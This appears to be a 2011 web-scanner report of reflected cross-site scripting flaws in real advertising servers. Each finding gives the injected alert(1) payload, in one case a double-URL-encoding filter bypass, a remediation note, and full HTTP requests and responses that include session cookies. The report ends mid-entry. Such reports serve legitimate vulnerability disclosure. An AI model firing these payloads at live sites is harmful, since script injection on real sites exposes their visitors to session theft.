This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l70a70"-alert(1)-"52f10523c4a&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:04:27 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7517
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1e7/%2a/s%3B233905705%3B0-0%3B0%3B57865904%3B4307-300/250%3B39213496/39231283/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l70a70"-alert(1)-"52f10523c4a&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20u ...[SNIP]...
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a018%2527%253balert%25281%2529%252f%252f29ac3d5f519 was submitted in the admeld_callback parameter. This input was echoed as 3a018';alert(1)//29ac3d5f519 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the admeld_callback request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /v0/admeld-match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=420&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match3a018%2527%253balert%25281%2529%252f%252f29ac3d5f519 HTTP/1.1 Host: ad.yieldmanager.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; 
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:53:03 GMT P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Cache-Control: private Content-Length: 261 Content-Type: text/javascript Age: 0 Proxy-Connection: close Server: YTS/1.18.4
document.write('<img width="0" height="0" src="http://tag.admeld.com/match3a018';alert(1)//29ac3d5f519?admeld_adprovider_id=420&external_user_id=0&expiration=1297968783" /><img width="0" height="0" sr ...[SNIP]...
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8cd2'%3balert(1)//13a730e6121 was submitted in the admeld_adprovider_id parameter. This input was echoed as b8cd2';alert(1)//13a730e6121 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=78b8cd2'%3balert(1)//13a730e6121&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: admeld-match.dotomi.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754766130&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:53:02 GMT X-Name: rtb-o06 Content-Type: text/javascript Connection: close Content-Length: 160
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19652'%3balert(1)//c53cf824e4b was submitted in the admeld_callback parameter. This input was echoed as 19652';alert(1)//c53cf824e4b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match19652'%3balert(1)//c53cf824e4b HTTP/1.1 Host: admeld-match.dotomi.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754766130&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:53:03 GMT X-Name: rtb-o03 Content-Type: text/javascript Connection: close Content-Length: 160
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff5e8'%3balert(1)//fba03bbdfb2 was submitted in the admeld_adprovider_id parameter. This input was echoed as ff5e8';alert(1)//fba03bbdfb2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /clicksense/admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=73ff5e8'%3balert(1)//fba03bbdfb2&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: admeld.lucidmedia.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754766130&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 2=2r4Mi92x-Y-; 1609092=00000000001
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2d68'%3balert(1)//7361267a395 was submitted in the admeld_callback parameter. This input was echoed as e2d68';alert(1)//7361267a395 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /clicksense/admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matche2d68'%3balert(1)//7361267a395 HTTP/1.1 Host: admeld.lucidmedia.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754766130&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 2=2r4Mi92x-Y-; 1609092=00000000001
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 6c86c<script>alert(1)</script>03ede497a81 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1341369&pid=8797686c86c<script>alert(1)</script>03ede497a81&ps=-1&zw=320&zh=280&url=http%3A//www.thestreet.com/story/229c029d89d776ed%29%28sn%3D*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html&v=5&dct=Sorry%2C%20the%20page%20you%20requested%20could%20not%20be%20found&ref=http%3A//burp/show/16 HTTP/1.1 Host: ads.adsonar.com Proxy-Connection: keep-alive Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:23:30 GMT Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC" Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding,User-Agent Content-Length: 2536
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script>
java.lang.NumberFormatException: For input string: "8797686c86c<script>alert(1)</script>03ede497a81"
The value of the placementId request parameter is copied into an HTML comment. The payload 842ea--><script>alert(1)</script>48d2a0518b4 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1341369842ea--><script>alert(1)</script>48d2a0518b4&pid=879768&ps=-1&zw=320&zh=280&url=http%3A//www.thestreet.com/story/229c029d89d776ed%29%28sn%3D*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html&v=5&dct=Sorry%2C%20the%20page%20you%20requested%20could%20not%20be%20found&ref=http%3A//burp/show/16 HTTP/1.1 Host: ads.adsonar.com Proxy-Connection: keep-alive Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:23:21 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/plain Content-Length: 3402
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "1341369842ea--><script>alert(1)</script>48d2a0518b4" --> ...[SNIP]...
The value of the ps request parameter is copied into an HTML comment. The payload 68d8c--><script>alert(1)</script>c52ad980c6e was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1341369&pid=879768&ps=-168d8c--><script>alert(1)</script>c52ad980c6e&zw=320&zh=280&url=http%3A//www.thestreet.com/story/229c029d89d776ed%29%28sn%3D*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html&v=5&dct=Sorry%2C%20the%20page%20you%20requested%20could%20not%20be%20found&ref=http%3A//burp/show/16 HTTP/1.1 Host: ads.adsonar.com Proxy-Connection: keep-alive Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:23:42 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/plain Content-Length: 3841
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-168d8c--><script>alert(1)</script>c52ad980c6e" -->
...[SNIP]...
1.58. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.bluelithium.com
Path: /st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbeb5"-alert(1)-"cefe6b77701 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=1x1&section=1678185&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel&dbeb5"-alert(1)-"cefe6b77701=1 HTTP/1.1 Host: ads.bluelithium.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754832540&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F66 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:53:40 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Thu, 03 Feb 2011 18:53:40 GMT Pragma: no-cache Content-Length: 5050 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id= ...[SNIP]... ype = "iframe"; rm_url = "http://ads.bluelithium.com/imp?Z=1x1&admeld_callback=http%3a%2f%2ftag.admeld.com%2fpixel&admeld_dataprovider_id=11&admeld_user_id=6acccca4%2dd0e4%2d464e%2da824%2df67cb28d5556&dbeb5"-alert(1)-"cefe6b77701=1&s=1678185&_salt=3597926079";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if( ...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48655'%3balert(1)//ba986b9e810 was submitted in the h parameter. This input was echoed as 48655';alert(1)//ba986b9e810 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=C8EFE2E&w=728&h=9048655'%3balert(1)//ba986b9e810 HTTP/1.1 Host: ads.roiserver.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 381 Date: Thu, 03 Feb 2011 16:08:06 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://ads.roiserver.com/disp?pid=C8EFE2E&rand=" + myRand;
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9352f"%3balert(1)//887397266bd was submitted in the pid parameter. This input was echoed as 9352f";alert(1)//887397266bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=C8EFE2E9352f"%3balert(1)//887397266bd&w=728&h=90 HTTP/1.1 Host: ads.roiserver.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 381 Date: Thu, 03 Feb 2011 16:07:49 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://ads.roiserver.com/disp?pid=C8EFE2E9352f";alert(1)//887397266bd&rand=" + myRand;
The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d76ed'%3balert(1)//7fc95e77677 was submitted in the w parameter. This input was echoed as d76ed';alert(1)//7fc95e77677 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=C8EFE2E&w=728d76ed'%3balert(1)//7fc95e77677&h=90 HTTP/1.1 Host: ads.roiserver.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 381 Date: Thu, 03 Feb 2011 16:07:54 GMT
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://ads.roiserver.com/disp?pid=C8EFE2E&rand=" + myRand;
The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9934'-alert(1)-'9b44b809a0d was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /serve/v=5;m=2;l=10980;cxt=99061898:2148402-10000150:2148402;kw=;ts=62446;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3DzB_hgTzzd8E%3Btm%3D0-0e9934'-alert(1)-'9b44b809a0d HTTP/1.1 Host: ads.specificmedia.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/300x250/accuweather_btf?t=1296754789156&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5035.928757113086138685
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:53:37 GMT Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0 Set-cookie: smu=5066.928757113086138685; domain=.specificmedia.com; path=/; expires=Fri, 08-Jan-2016 18:53:37 GMT P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV" Content-Length: 370 Expires: Wed, 02 Feb 2011 18:53:37 GMT Cache-Control: no-cache,must-revalidate Pragma: no-cache Connection: close Content-Type: application/x-javascript
1.63. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.specificmedia.com
Path: /serve/v=5
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15f9d'-alert(1)-'2c3bcbaf79d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /serve/v=5;m=2;l=10980;cxt=99061898:2148402-10000150:2148402;kw=;ts=62446;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3DzB_hgTzzd8E%3Btm%3D0-0&15f9d'-alert(1)-'2c3bcbaf79d=1 HTTP/1.1 Host: ads.specificmedia.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/300x250/accuweather_btf?t=1296754789156&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5035.928757113086138685
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:53:38 GMT Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0 Set-cookie: smu=5066.928757113086138685; domain=.specificmedia.com; path=/; expires=Fri, 08-Jan-2016 18:53:38 GMT P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV" Content-Length: 373 Expires: Wed, 02 Feb 2011 18:53:38 GMT Cache-Control: no-cache,must-revalidate Pragma: no-cache Connection: close Content-Type: application/x-javascript
1.64. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://adserving.cpxinteractive.com
Path: /st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa4b7"-alert(1)-"af13f1e484 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
